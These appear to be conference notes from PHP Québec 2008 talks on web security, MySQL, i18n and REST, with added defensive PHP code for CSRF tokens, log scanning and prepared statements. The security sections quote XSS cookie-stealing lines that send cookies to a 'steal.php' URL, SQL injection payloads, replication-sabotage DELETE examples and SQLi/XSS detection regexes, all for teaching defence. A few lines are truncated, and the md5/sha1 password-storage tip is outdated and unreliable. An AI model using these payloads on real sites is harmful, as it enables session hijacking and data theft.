=External links=
* [http://conf.phpquebec.com/fr/ Official site] of the conference
* [http://www.go-referencement.org/conferences-et-evenements/conference-php-quebec-2008-resume.html Some slides]
=Additional information=
* A DVD of the 2004 conference is available in the library
=Day 1 - Thursday=
==The age of literate machines==
- Speaker: Zak Greant
- High interest, mostly philosophical talk
- Communication since the beginning
- The power of information
- scribes, printers, etc.
- Control of information (book burning, killing people)
- Publication monopoly
- With radio and TV, people lost the power to communicate
- We are regaining it with the internet
- Use open standards
==Performance-minded MySQL for PHP Developers==
- Speaker: Jay Pipes (MySQL inc.)
- PDF:
==Help. My web site has been hacked! Now what?==
- Speaker: Eli White
- Skills: Software (not hardware or sysadmin)
- digg.com/jobs? He talks about it a lot in his examples
- eliw.com or digg.com—EliW
- book: PHP 5 in practice
- Thinking about security
- 3 stages
- prevention
- preparation
- panic
- Definition of hacked
- SQL Injection
- XSS
- CSRF (Cross Site Request Forgery)
- Session Hijacking
- Not talking here about: network attacks, apache/php/mysql, physical attacks
- SQL Injection
- Validate every entry received from the user
- The user sends data that is interpreted by the database
- XSS
- The user sends data that is directly interpreted as HTML (and therefore JavaScript)
- CSRF
- Forge or force a request on behalf of another user
- ex: inject an img tag that loads an image from another web site
- Session Hijacking
- session_start()
- session_regenerate_id() upon any change of permission
- if ($_SESSION != regenerate_secret()
- Discovery methods
- whitehat, hacker announcement & exploit, user complaints, physical demarcation, logs/stats monitoring
- hints:
- check for SQL statements in the Apache logs
- Immediate response
- Let it live
- Break functionality
- Shut down the website
- look around to find everything that has been exploited, corrupted, and so on
- looking up hacker announcements could help find the issue
- view source
- view generated source
- scan for all JavaScript and .js files
- look for iframes
- looking at logs
- limit the timeframe
- look for odd or out-of-sequence events
- scan for GET parameters that are improper
- scan other fields such as referer and user agent
- tracks: who, when, IP, referer and more
- log all SQL queries that fail
- first attempts will fail
- malformed SQL queries are the best culprits
- scan for common XSS terms (script, onclick, onfocus)
- look up the database for bad data
- ex: select username from usertable where username like '%onclick%'
- Obscure stuff
- Referer, UserAgent, Cookies, etc.
- htmldecode() after escaping, encoded JavaScript, etc.
- if there is a mismatch between PHP/HTML/database encodings (UTF-8, ISO, ...) the escaping may not work properly
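The log-scanning hints above (GET parameters, referer and user agent, SQL fragments, common XSS terms, decoding before matching) fit in one small triage script. The following PHP is an added example, not code from Eli White's talk: it parses Apache combined-format lines, URL-decodes the fields and reports which pattern family matched. The log lines are constructed for the demo, and the regular expressions are a starting point rather than a complete signature set.

```php
<?php
// Added example (not from the talk): first-pass triage over an Apache access
// log, following the notes above. Every log line below is constructed.

declare(strict_types=1);

/** Constructed sample lines in Apache "combined" format. */
function sampleLog(): string
{
    return <<<'LOG'
10.0.0.5 - - [10/Mar/2008:10:01:22 -0500] "GET /index.php?page=about HTTP/1.1" 200 1532 "http://example.test/" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2008:10:02:05 -0500] "GET /login.php?user=admin%27%20OR%20%27%27%3D%27 HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2008:10:02:40 -0500] "GET /profile.php?id=5%20union%20select%20database() HTTP/1.1" 500 310 "-" "Mozilla/5.0"
10.0.0.12 - - [10/Mar/2008:10:03:10 -0500] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 980 "-" "Mozilla/5.0"
10.0.0.14 - - [10/Mar/2008:10:04:01 -0500] "GET /index.php HTTP/1.1" 200 1532 "-" "<img src=x onfocus=alert(1)>"
LOG;
}

// The two families the talk mentions. Word boundaries keep "onfocus" from
// matching inside ordinary words; the SQL pattern looks for the quote-and-
// operator shapes that show up in first, failed attempts.
const SQL_PATTERN = '/(\bunion\b\s+\bselect\b|\bor\b\s*\'[^\']*\'\s*=\s*\'|\binto\s+outfile\b|--\s|;\s*(drop|delete|update)\b)/i';
const XSS_PATTERN = '/(<\s*script\b|<\s*iframe\b|\bon(click|focus|load|error|mouseover)\s*=|javascript:)/i';

/**
 * Parse one combined-format line into the fields we care about.
 * Returns null when the line does not look like a combined-format record.
 */
function parseCombinedLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return [
        'ip'      => $m[1],
        'time'    => $m[2],
        'method'  => $m[3],
        'url'     => $m[4],
        'status'  => (int) $m[5],
        'referer' => $m[6],
        'agent'   => $m[7],
    ];
}

/**
 * Return the suspicious records, each tagged with the field that matched
 * and the pattern family. Fields are URL-decoded first, because the
 * payload is rarely sent in clear text.
 */
function scanAccessLog(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $rec = parseCombinedLine($line);
        if ($rec === null) {
            continue;
        }
        $query  = (string) parse_url($rec['url'], PHP_URL_QUERY);
        $fields = [
            'query'   => rawurldecode($query),
            'referer' => rawurldecode($rec['referer']),
            'agent'   => rawurldecode($rec['agent']),
        ];
        foreach ($fields as $name => $value) {
            if ($value === '') {
                continue;
            }
            foreach (['sqli' => SQL_PATTERN, 'xss' => XSS_PATTERN] as $kind => $pattern) {
                if (preg_match($pattern, $value)) {
                    $hits[] = ['ip' => $rec['ip'], 'time' => $rec['time'], 'field' => $name, 'kind' => $kind, 'value' => $value];
                }
            }
        }
    }
    return $hits;
}

// Four of the five constructed lines are flagged: two sqli in the query
// string, one xss in the query string, one xss in the user agent.
foreach (scanAccessLog(sampleLog()) as $h) {
    printf("%-10s %s %-7s %-5s %s\n", $h['ip'], $h['time'], $h['field'], $h['kind'], $h['value']);
}
```

Run it with `php scan.php`, or feed a real file by replacing `sampleLog()` with `file_get_contents($path)`. Narrowing the time window first, as the notes suggest, keeps the output reviewable; the same `LIKE '%onclick%'` check against the database is the complementary step once the log has shown which fields were hit.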
==Security 2.0==
- Speaker: Chris Shiflett
- csrf / xss (cross-site scripting) / 2.0h
- shiflett.org omniti.com
- phpsecurity.org phpsec.org
- Book: Essential php security (O'Reilly)
- web 1.0 vs web 2.0
- contextual, user collaboration, services, blogs, tagging
- taxonomy vs folksonomy
- XSS
- attacker -input-> target (you / website) -html-> victim
- stealing cookies
- document. = '..steal.php?' + encodeURI(document.cookie);
- stealing form data
- document.forms[0].action = '..steal.php';
- using a hidden form in the page and the browser's auto-fill feature to steal passwords
- FIEO (Filter Input, Escape Output)
- input -filter-> business logic -escape-> output
- CSRF (cross site request forgery)
- attacker -> victim -> target (you / website)
- ex: add an img tag requesting a URL that buys something while the user is logged in
- could block this by requiring POST requests and not accepting GET requests
- ex: using an iframe with a form and a script
- the script could be document.buy.submit();
- examples: shiflett.org—amazon.php, 4diggers.blogspot.com (they are fixed but are good examples)
- script: new Image().src = '...url...' + encodeURI(document.cookie);
- Anti-CSRF Token
- $token = md5(uniqid(rand(), TRUE));
- $_SESSION['token'] = $token;
- $html['token'] = htmlentities($token, ENT_QUOTES, 'UTF-8');
- add <input type="hidden" name="token" value="<?php echo $html['token']; ?>">
- AJAX (Asynchronous JavaScript + XML)
- Client-side technology/technique that allows two-way communication between the client and the server without reloading the page.
- Browser hijacking: shiflett.org—using-csrf-for-browser-hijacking
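The anti-CSRF token, FIEO and the earlier session_regenerate_id() point from Eli White's talk belong together in practice. The PHP below is an added example, not code from either talk or from phpsec.org: it issues a per-session token, verifies it in constant time on a POST, filters the purchase input, escapes the output, and rotates the session id at the (hypothetical) login step. `random_bytes` and `hash_equals` replace the `md5(uniqid(rand(), TRUE))` token from the slides; the `buy.php` form and the item/quantity fields are assumptions for the demo.

```php
<?php
// Added example, not code from the talks. One small page that applies the
// three habits in the notes: rotate the session id when privileges change,
// filter input / escape output, and bind an anti-CSRF token to the session.

declare(strict_types=1);

/** Issue (or reuse) the per-session anti-CSRF token. */
function csrfToken(): string
{
    if (empty($_SESSION['token'])) {
        // replaces md5(uniqid(rand(), TRUE)) from the slides with a CSPRNG
        $_SESSION['token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['token'];
}

/** Constant-time comparison of the submitted token with the session copy. */
function csrfTokenIsValid($submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['token'])
        && hash_equals($_SESSION['token'], $submitted);
}

/** Escape output for an HTML context (the "EO" of FIEO). */
function escapeHtml(string $s): string
{
    return htmlentities($s, ENT_QUOTES, 'UTF-8');
}

/** Filter input: accept only what the "buy" action needs (the "FI" of FIEO). */
function filterPurchaseInput(array $post): ?array
{
    $qty  = filter_var($post['qty'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 99]]);
    $item = $post['item'] ?? '';
    if ($qty === false || !is_string($item) || !preg_match('/^[A-Za-z0-9_-]{1,32}$/', $item)) {
        return null;
    }
    return ['item' => $item, 'qty' => $qty];
}

/** Handle a purchase request; returns a status string instead of redirecting. */
function handlePurchase(string $method, array $post): string
{
    if ($method !== 'POST') {
        return 'rejected: GET is not accepted for state-changing actions';
    }
    if (!csrfTokenIsValid($post['token'] ?? null)) {
        return 'rejected: missing or invalid CSRF token';
    }
    $input = filterPurchaseInput($post);
    if ($input === null) {
        return 'rejected: invalid item or quantity';
    }
    return sprintf('ok: %d x %s', $input['qty'], $input['item']);
}

/** Render the form with the hidden token field, every value escaped. */
function renderPurchaseForm(string $item): string
{
    return '<form name="buy" method="post" action="buy.php">'
        . '<input type="hidden" name="token" value="' . escapeHtml(csrfToken()) . '">'
        . '<input type="hidden" name="item" value="' . escapeHtml($item) . '">'
        . '<input type="number" name="qty" value="1">'
        . '<input type="submit" value="Buy">'
        . '</form>';
}

// Minimal driver so the file runs from the CLI (session files in the temp dir).
session_save_path(sys_get_temp_dir());
session_start();
// Hypothetical login step: rotate the id so a pre-login id cannot be reused.
session_regenerate_id(true);

echo renderPurchaseForm('book-42'), "\n";
echo handlePurchase('GET',  ['item' => 'book-42', 'qty' => '1']), "\n";
echo handlePurchase('POST', ['item' => 'book-42', 'qty' => '1']), "\n";   // no token
echo handlePurchase('POST', ['item' => 'book-42', 'qty' => '1', 'token' => csrfToken()]), "\n";
echo handlePurchase('POST', ['item' => '<b>x</b>', 'qty' => '1', 'token' => csrfToken()]), "\n";
```

Requiring POST alone does not stop the iframe-plus-`document.buy.submit()` variant in the notes; the token check is what does, because the attacker's page cannot read the victim's session token. Escaping the token when it is written into the form is what keeps the "escape output" rule intact even for values the application generated itself.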
==PHP For Polyglots - Web applications and i18n==
- Speaker: Marc Wandschneider
- Powerpoint:
- Keynote:
- UTF-8
- PHP
- Utiliser mb_ functions pour un meilleur support de UTF-8 (mb_strlen, mb_substr, etc)
- Utiliser les array() pour les langues
- Javascript
- Utiliser PHP pour dumper les "traductions" en format supporter par Javascript
- URL
- Conseille, si possible, de passer la langue de le URL (ex.: http://domain.com/fr-CA/video)
- En gros, la plupart de ses conseils sont déjà appliqués dans EspaceCanoë
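The two PHP-side points above (mb_ functions for UTF-8 strings, and dumping the translation arrays into JavaScript) are shown in the added example below, which is not code from Marc Wandschneider's talk. The translation table and the `i18n` variable name are constructed for the demo; the `JSON_HEX_*` flags are what keep a translation containing `</script>` from breaking out of the inline script block.

```php
<?php
// Added example, not from the talk: UTF-8-safe string handling with the
// mb_ functions, and a translation table emitted for JavaScript.

declare(strict_types=1);

/** Byte length vs. character length of a UTF-8 string. */
function lengths(string $s): array
{
    // strlen counts bytes; mb_strlen counts characters ("Canoë" is 6 and 5)
    return ['bytes' => strlen($s), 'chars' => mb_strlen($s, 'UTF-8')];
}

/** Truncate to $n characters without cutting a multibyte sequence in half. */
function truncateUtf8(string $s, int $n): string
{
    return mb_substr($s, 0, $n, 'UTF-8');
}

/** Emit one language's translation table as an inline <script> block. */
function translationsAsScript(string $lang, array $translations): string
{
    if (!isset($translations[$lang])) {
        throw new InvalidArgumentException("no translations for $lang");
    }
    // HEX flags encode < > & ' " as \uXXXX so the JSON is safe inside <script>
    $flags = JSON_UNESCAPED_UNICODE | JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $json  = json_encode($translations[$lang], $flags);
    if ($json === false) {
        throw new RuntimeException('invalid UTF-8 in translations: ' . json_last_error_msg());
    }
    return '<script>var i18n = ' . $json . ';</script>';
}

// Constructed sample: one array per language, as the talk suggests. The
// "bad" entry stands in for a translation edited by someone untrusted.
$translations = [
    'fr-CA' => ['title' => 'Espace Canoë', 'watch' => 'Regarder la vidéo', 'bad' => '</script><script>alert(1)</script>'],
    'en-CA' => ['title' => 'Canoë Space',  'watch' => 'Watch the video',    'bad' => '</script><script>alert(1)</script>'],
];

var_dump(lengths('Canoë'));
echo truncateUtf8('Canoë', 5), "\n";
echo translationsAsScript('fr-CA', $translations), "\n";
```

The language comes from the URL segment in the notes (`/fr-CA/video`); validate it against the keys of the translation array before using it, which is what the `isset` check in `translationsAsScript` does.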
==Rich desktop application==
- Speaker: Raphaël Rougeron
- (talk given in French) Contact him to get his REST framework
- www.stato-framework.org
- RIA (Rich Internet Application) / RDA (Rich Desktop Application)
- RIA
- AJAX libraries
- XUL + CSS + JS
- Flash/Flex
- Silverlight (like the Flash player)
- Java applets
- RDA
- XulRunner
- Adobe AIR
- .NET (WPF)
- Java Web Start
- In between
- Google Gears: local storage
- Prism
- Adobe AIR
- Windows and OS X (Linux soon)
- Flash+AS or Flex+AS or HTML+CSS+JS
- WebKit engine
- audio/video support (Flash & H.264)
- supported by jQuery, ExtJS, Dojo, ...
- XulRunner (XML-based User interface Language)
- Gecko engine
- XBL: definition of interface components
- XPCOM: creation of reusable business components in JS, C, C++, Python
- JS API
- image manipulation
- file system
- drag'n drop
- SongBird, Miro, Joost, webophone, comodo
- Audio/Video: use of a component based on VLC
- RDA recommendations
- Activity indicators (loading...)
- Keyboard shortcut handling
- Implement copy-paste
- Button hover states
- Adopt the look & feel of desktop applications
- AIR vs XULRunner
- To get started with XULRunner, writing a Firefox extension is a good start
- Client-server relations
- Simplest approach: REST
- Resources and URIs
- GET, POST, PUT, DELETE, HEAD, OPTIONS
- Status codes: 200 OK, 201 Created, 400 Bad Request, etc.
- Resource representations: XML, JSON, Atom, RSS, iCal, CSV...
- Think resources rather than actions
- GET /posts : GET /posts
- POST /posts/add : POST /posts
- GET /posts/get/123 : GET /posts/123
- No REST support in Zend (even ZendRestServer), nor in symfony, CakePHP or CodeIgniter
- 2 REST frameworks: Konstruct and Tonic
- his own framework http://
- Rails 1.2 tries RESTful controllers
- Creation of resources containing GET, POST, PUT, DELETE actions
- WADL (WSDL for REST)
- RADAR (Dave Thomas): REST Application, Dumb-Ass Recipient
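The "resources rather than actions" mapping above (`GET /posts`, `POST /posts`, `GET /posts/123`) is shown as a minimal dispatcher in the added PHP below; it is not code from Raphaël Rougeron's talk or from the Stato framework. The method chooses the action, the path chooses the resource, and the status codes from the notes (200, 201, 400) plus 404 and 405 come back with the body. The in-memory `PostStore` and the sample requests are constructed.

```php
<?php
// Added example, not from the talk: a resource-oriented dispatcher for the
// /posts examples in the notes. Returns [status, body] so it runs from the CLI.

declare(strict_types=1);

/** In-memory stand-in for the posts table (constructed data). */
final class PostStore
{
    private array $posts = [123 => ['id' => 123, 'title' => 'Hello']];
    private int $nextId = 124;

    public function all(): array { return array_values($this->posts); }
    public function find(int $id): ?array { return $this->posts[$id] ?? null; }
    public function create(string $title): array
    {
        $post = ['id' => $this->nextId++, 'title' => $title];
        $this->posts[$post['id']] = $post;
        return $post;
    }
    public function delete(int $id): bool
    {
        if (!isset($this->posts[$id])) {
            return false;
        }
        unset($this->posts[$id]);
        return true;
    }
}

/** Dispatch one request: the method is the verb, the path is the resource. */
function dispatch(PostStore $store, string $method, string $path, array $input = []): array
{
    if ($path === '/posts') {
        switch ($method) {
            case 'GET':
                return [200, $store->all()];
            case 'POST':
                $title = trim((string) ($input['title'] ?? ''));
                if ($title === '' || mb_strlen($title, 'UTF-8') > 200) {
                    return [400, ['error' => 'title is required (max 200 chars)']];
                }
                return [201, $store->create($title)];
            default:
                return [405, ['allow' => 'GET, POST']];   // unsupported verb, not 404
        }
    }
    if (preg_match('#^/posts/(\d+)$#', $path, $m)) {
        $id = (int) $m[1];
        switch ($method) {
            case 'GET':
                $post = $store->find($id);
                return $post === null ? [404, ['error' => 'not found']] : [200, $post];
            case 'DELETE':
                return $store->delete($id) ? [200, ['deleted' => $id]] : [404, ['error' => 'not found']];
            default:
                return [405, ['allow' => 'GET, DELETE']];
        }
    }
    return [404, ['error' => 'no such resource']];
}

$store = new PostStore();
foreach ([
    ['GET',  '/posts'],
    ['POST', '/posts', ['title' => 'Second post']],
    ['POST', '/posts', ['title' => '']],
    ['GET',  '/posts/124'],
    ['PUT',  '/posts/124'],
    ['GET',  '/posts/get/123'],   // the action-style URL the talk advises against
] as $req) {
    [$status, $body] = dispatch($store, $req[0], $req[1], $req[2] ?? []);
    printf("%-6s %-16s -> %d %s\n", $req[0], $req[1], $status, json_encode($body));
}
```

A front controller would read `$_SERVER['REQUEST_METHOD']` and the path, call `dispatch`, then `http_response_code($status)` and `json_encode($body)`; keeping the dispatcher free of globals is what makes it testable from the CLI as above.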
==PECL: The php language workbench==
- Sebastian Bergmann
- sebastian-bergmann.de
sebastian-bergmann.de—talks
- PECL: Php Extension C Library
- php5? pecl? meta programming? aop?
- PECL has extension that
- add normal functionality to php
- add not so normal
- operator
- vld (vulcan logic disassembler)
- parsekit
- parse tree
- runkit
- intercept
- Operator overloading
- about each operator like +, -, *, >>, ...
- disassembler for php bytecode
- alias vld="php -dvld.active=1 -dvld.execute=0"
- //could also look at something named "depends"
- ext/parsekit
- parsekit_compile_string()
- parsekit_compile_file()
- ext/parse_tree
- //speaking about code sniff
- useful for analysis and refactoring of PHP source code
- Aspect-oriented programming with PHP // interlude
- new modularization concept
- Quantification
- Obliviousness
- aspect, pointcut, around
- ext/runkit
- replace, rename and delete classes, methods and functions at runtime
- define additional super-global variables
- execute code in a sandbox
- ex: runkit_method_add(...)
- Generic Aspects for PHP
- ext/intercept
- Intercept function calls
- execution before and after code is executed
==Introduction to PHP 5.3==
- Ilia Alshanetsky
- ilia.ws
- Core PHP developer
- Adding namespace
- namespace MY;
- function MY_wrapper();
- use MY as MY
- wrapper()
- Multiple namespace per file
- Autoload function
- Improved performance
- md5 10-15% better
- better stack
- ...
- Operator ?:
- __call() equivalent for static methods
- late static binding
- MySQLInd
- specialized high-speed library to interface with MySQL
- better performance, improved memory usage, ability to fetch stats for performance tuning, built-in driver, no PDO_Mysql support yet
- .htaccess style ini controls
- per-directory ini settings inside php.ini
- improved config error handling
- Extra OpenSSL Functions
- openssl_get_md_methods()
- openssl_digest()
- openssl_get_cipher_methods()
- openssl_encrypt()
- openssl_decrypt()
- openssl_pkey_new() / openssl_pkey_get_details()
- SPL Improvements
- FilesystemIterator
- GlobIterator
- Date Extension additions
- strtotime via date_create_from_format('format', 'date')
- returns an object formattable using $returned_date->format('format');
- date_get_last_errors()
- warning_count
- warnings
- error_count
- errors
- getopt() improvement
- native implementation
- cross-platform support
- XSLT profiling
- $xslt = new XSLTProcessor();
- $xslt->importStylesheet($xml);
- $xslt->setProfiling("/tmp/profile.txt");
- $xslt->transform...
- E_DEPRECATED
- Garbage collector
- gc_enable()
- var_dump(gc_enabled())
- var_dump(gc_collect_cycles())
- gc_disable()
- Miscellaneous
- SQLite upgraded to 3.5.6
- 40 bug fixes
- CGI/FastCGI SAPI improvements
- stream improvements
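The OpenSSL functions listed in this talk (openssl_get_cipher_methods, openssl_encrypt/openssl_decrypt, openssl_get_md_methods, openssl_digest) are exercised in the added PHP below, which is not code from Ilia Alshanetsky's talk. It uses a fresh random IV per message and an authenticated mode (AES-256-GCM, available through these functions since PHP 7.1) so that tampering is detected on decrypt; the key is generated on the fly for the demo and would otherwise live outside the code.

```php
<?php
// Added example, not from the talk: authenticated encryption and a digest
// with the openssl_* functions listed in the notes.

declare(strict_types=1);

const CIPHER = 'aes-256-gcm';
const TAG_LEN = 16;

/** Encrypt $plaintext; returns a base64 blob laid out as iv || tag || ciphertext. */
function sealMessage(string $key, string $plaintext): string
{
    if (!in_array(CIPHER, openssl_get_cipher_methods(true), true)) {
        throw new RuntimeException(CIPHER . ' is not available in this build');
    }
    $iv  = random_bytes(openssl_cipher_iv_length(CIPHER));   // never reuse an IV with a key
    $tag = '';
    $ct  = openssl_encrypt($plaintext, CIPHER, $key, OPENSSL_RAW_DATA, $iv, $tag, '', TAG_LEN);
    if ($ct === false) {
        throw new RuntimeException('encrypt failed: ' . openssl_error_string());
    }
    return base64_encode($iv . $tag . $ct);
}

/** Reverse of sealMessage; returns null when the tag does not verify. */
function openMessage(string $key, string $blob): ?string
{
    $raw   = base64_decode($blob, true);
    $ivLen = openssl_cipher_iv_length(CIPHER);
    if ($raw === false || strlen($raw) < $ivLen + TAG_LEN) {
        return null;
    }
    $iv  = substr($raw, 0, $ivLen);
    $tag = substr($raw, $ivLen, TAG_LEN);
    $ct  = substr($raw, $ivLen + TAG_LEN);
    $pt  = openssl_decrypt($ct, CIPHER, $key, OPENSSL_RAW_DATA, $iv, $tag);
    return $pt === false ? null : $pt;
}

/** Fingerprint with one of the digests reported by openssl_get_md_methods(). */
function fingerprint(string $data): string
{
    if (!in_array('sha256', openssl_get_md_methods(true), true)) {
        throw new RuntimeException('sha256 is not available in this build');
    }
    return openssl_digest($data, 'sha256');
}

$key  = random_bytes(32);                       // 256-bit key, generated for the demo only
$blob = sealMessage($key, 'secret report');
printf("sealed:   %s\n", $blob);
printf("opened:   %s\n", openMessage($key, $blob));

// Flip one bit of the ciphertext: the GCM tag no longer verifies and
// openMessage() returns null instead of corrupted plaintext.
$raw = base64_decode($blob);
$raw[strlen($raw) - 1] = chr(ord($raw[strlen($raw) - 1]) ^ 0x01);
printf("tampered: %s\n", var_export(openMessage($key, base64_encode($raw)), true));
printf("sha256:   %s\n", fingerprint($blob));
```

The tag is what distinguishes this from a bare `openssl_encrypt` call in CBC mode: without it, a modified ciphertext decrypts to garbage that the application may act on. The same functions take the list of algorithms from `openssl_get_cipher_methods()`, so the availability check at the top is cheap and avoids a silent fallback.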
=Day 2 - Friday=
==API Design==
- David Sklar
- David@ning.com
- PHP API - REST API
- XN_Content exemple
- $dinner = XN_Content::create('Meal');
- $dinner->title = 'Salt baked combo';
- $dinner->save();
- gives
- POST /xn/atom/1.0/content
- Content-Type: text/xml; charset=UTF-8
- Design priorities
- promote predictability, modularity, stability
- choose human performance over computer performance
- make efficiency easy, make inefficiency hard/impossible
- At the start
- write code before you write the API
- use cases, use cases, use cases
- Names matter (but don't discuss them forever)
- Use the API before it exists
- sketch out what you want to do
- Use cases first
- what does the API need to do (not what it could do)
- Need-Driven Development
- adding is easy, removing is hard
- you have a lot of freedom with arguments
- accessors provide insulation
- long parameter lists are toxic
- static and dynamic analysis
- find + grep
- XN_Event
- before and after events.
- Names
- at Ning, adding XN means "hands off"
- class names
- property names
- xml namespace prefixes
- Documentation: docblocks: Yay! and Boo!
- phpdocumentor, doxygen
- Avoiding attribute naming conflict between system attr. and
user attr.
- content->title and content->my_attrib YES!
- content->xn_title and content->attrib YES!
- content[title] and content->attrib NO! (not mixing up
syntax)
- Testing and code coverage
- the contract with users is the test suite
- "The extent of your test suite is the strength of your contract with your users"
- SimpleTest www.lastcraft.com—simple_test.php
and PHPUnit
phpunit.de
- To keep in mind
- Lean towards use cases rather than unconstrained possibilities
- naming, versioning and documentation are not afterthoughts
- test suite code coverage is all you have to guarantee
backwards compatibility
- lcsd05.cs.tamu.edu—keynotepdf
- framework.zend.com—manual
- ez.no—component...
- http://jobs.ning.com/ david@ning.com
==Security from the Database Perspective==
- Morgan Tocker morgan@mysql.com
- Security is a process, not a product
- Some of the problems
- sql injection
- The application does not check input data before passing it on to the database
- magic_quotes
- mysql_real_escape_string()
- integer based injection
- multibyte character
- in GBK, 0xbf27 becomes garbage+quote in a single-byte charset
- bypass login, change data, send email or execute system commands, ....
- .... and I=0 union select database()
- ... and i=0 union select ....
- ... or ''=''
- denial of service
- execute a long select... that locks the database
- Deep search result
- limit to the first N hundred
- log the queries (log-slow, log-query, log-query not using indexes)
- build the application so it can handle failure of queries and retry
- email yourself alerts by monitoring SHOW PROCESSLIST
- running with higher privileges than required
- LOAD DATA LOCAL INFILE feature
- could potentially load /etc/passwd if running as root
- SHOW GRANTS
- SHOW GRANTS for 'morgo'@'hostname'
- modify mysql.user and FLUSH to update
- use GRANT DELETE, INSERT, SELECT, UPDATE, CREATE TEMPORARY TABLES ON database.table TO 'username'@'host' IDENTIFIED BY 'password'
- avoid wildcard for access
- connection pooling issues
- opened transaction not freed
- temporary tables created not freed
- session variables not freed
- prepared statements not freed
- mtocker.livejournal.com
...
- set sql_log_bin=0; delete from..
- both in operating system and in mysql
- exposing the database server on 3306
- see --bind-address=127.0.0.1 and --skip-networking
options
- watch out for potentially expensive reverse lookups
- Others ideas
- Intentionally corrupting masters or slaves (proof of
concept)
- delete from users where user_id = 1 and @@server_id=2
- delete from users where user_id = 1 and @@server_id =
SYSDATE()%10+1
- Defenses
- Correctly escape data (mysql_real_escape_string and type checking for integers)
- potentially use prepared statements
- see mysql_secure_installation
- set root password
- remove anonymous users
- disallow root remote login
- remove test database and access to it
- tmp_table_size, max_heap_table_size : use low session
based buffers values
- set user limits within users to parts of the application
- max user connections (max conn per hour, max queries per
hour) dev.mysql.com—grant.html
- limit max_join_size to prevent cartesian products
- sql_mode
- use md5() or sha1() to store passwords
- secure/encrypt your backups
- prepare to change connect(..) pw in case of a leak
- 32-bit hardware allows 2.2-2.7G of handling and crashes after that
- no on-the-fly encryption; use AES_ENCRYPT/AES_DECRYPT within statements
- using stored procedures and/or views
- adjust permissions on the SP or view
- with that solution, no support for debugging or for languages other than SQL
- could check out MySQL Proxy (new product)
- overhead of a select 1
- performance issues could come with longer statements, as they must be completely received before being passed to the server
- could be used to rewrite queries or manipulate them
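The "Defenses" list above (correct escaping, type checking for integers, prepared statements) is shown in the added PHP below, which is not code from Morgan Tocker's talk. It puts the vulnerable string-built query beside the prepared-statement version and validates the integer case before it reaches the query. SQLite in memory stands in for MySQL so the file runs offline; the MySQL connection settings that matter for the GBK multibyte issue are in `mysqlPdo()`, which is defined but not called. The `users` table and the two rows are constructed.

```php
<?php
// Added example, not from the talk: vulnerable vs. prepared-statement lookup,
// plus integer validation. SQLite stands in for MySQL so it runs offline.

declare(strict_types=1);

/** How the connection should be opened against MySQL (not executed here). */
function mysqlPdo(string $host, string $db, string $user, string $pass): PDO
{
    // charset in the DSN tells the client library which encoding to escape for
    // (the GBK 0xbf27 case from the talk); EMULATE_PREPARES=false uses real
    // server-side prepares, so bound values never become part of the SQL text.
    return new PDO("mysql:host=$host;dbname=$db;charset=utf8mb4", $user, $pass, [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

/** VULNERABLE: the values are pasted straight into the statement. */
function loginUnsafe(PDO $pdo, string $user, string $pass): array
{
    $sql = "SELECT id, username FROM users WHERE username = '$user' AND password = '$pass'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

/** SAFE: placeholders; the values travel separately from the SQL. */
function loginSafe(PDO $pdo, string $user, string $pass): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = :u AND password = :p');
    $stmt->execute([':u' => $user, ':p' => $pass]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Integer-based lookup: validate the type before it reaches the query. */
function userById(PDO $pdo, string $id): ?array
{
    $id = filter_var($id, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;                        // "5 union select ..." stops here
    }
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed stand-in database.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$pdo->exec("INSERT INTO users VALUES (1, 'morgo', 'hashed-pw-1'), (2, 'alice', 'hashed-pw-2')");

$payload = "' OR ''='";    // the classic input from the notes
printf("unsafe: %d row(s)\n", count(loginUnsafe($pdo, $payload, $payload)));  // every user
printf("safe:   %d row(s)\n", count(loginSafe($pdo, $payload, $payload)));    // none
printf("by id:  %s\n", json_encode(userById($pdo, '1')));
printf("by id:  %s\n", json_encode(userById($pdo, '1 union select database()')));
```

The unsafe query also fails the "log all SQL queries that fail" advice from Eli White's talk in a useful way: the first malformed attempts show up in the error log, which is where the notes say to look. Combined with a `GRANT` limited to the tables the application needs, a successful injection is also confined to what that account can reach.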
==RIA With open standards==
- jeff griffiths, ActiveState jeffg@activestate.com
- RIA is a slippery buzzword
- showing Desktop application examples
- beatport.com
- songbird
- joost
- Why should we care
- PHP is the dominant back-end application server
- Even pure back-end application design should pay attention to RIA application design
- RIA is the future or something
- Components of RIA
- Server Back-end (php mysql apache)
- application layer
- multi-media run-time of some sort
- Server Side
- PHP and similar lead development
- Application Layer
- XML/HTML ui layer
- JavaScript/ActionScript scripting layer (JS functional language vs PHP procedural/object language)
- Styling / presentation layer
- Reason to choose web standards
- graceful degradation instead of a 'please
download/upgrade flash' link
- powerful new javascript tools and libraries like extjs,
yui, jquery
- great opensource developer tools
- maintain a consistent code base in one set of technologies instead of having to maintain multiple front-ends in different technologies
- tools for open standards
- firebug for firefox
- IE8 apparently has a firebug clone
- opensource ide support from aptana and activestate komodo
edit activestate.com
- Multi-media
- common ability for an RIA is to display streaming audio
and video
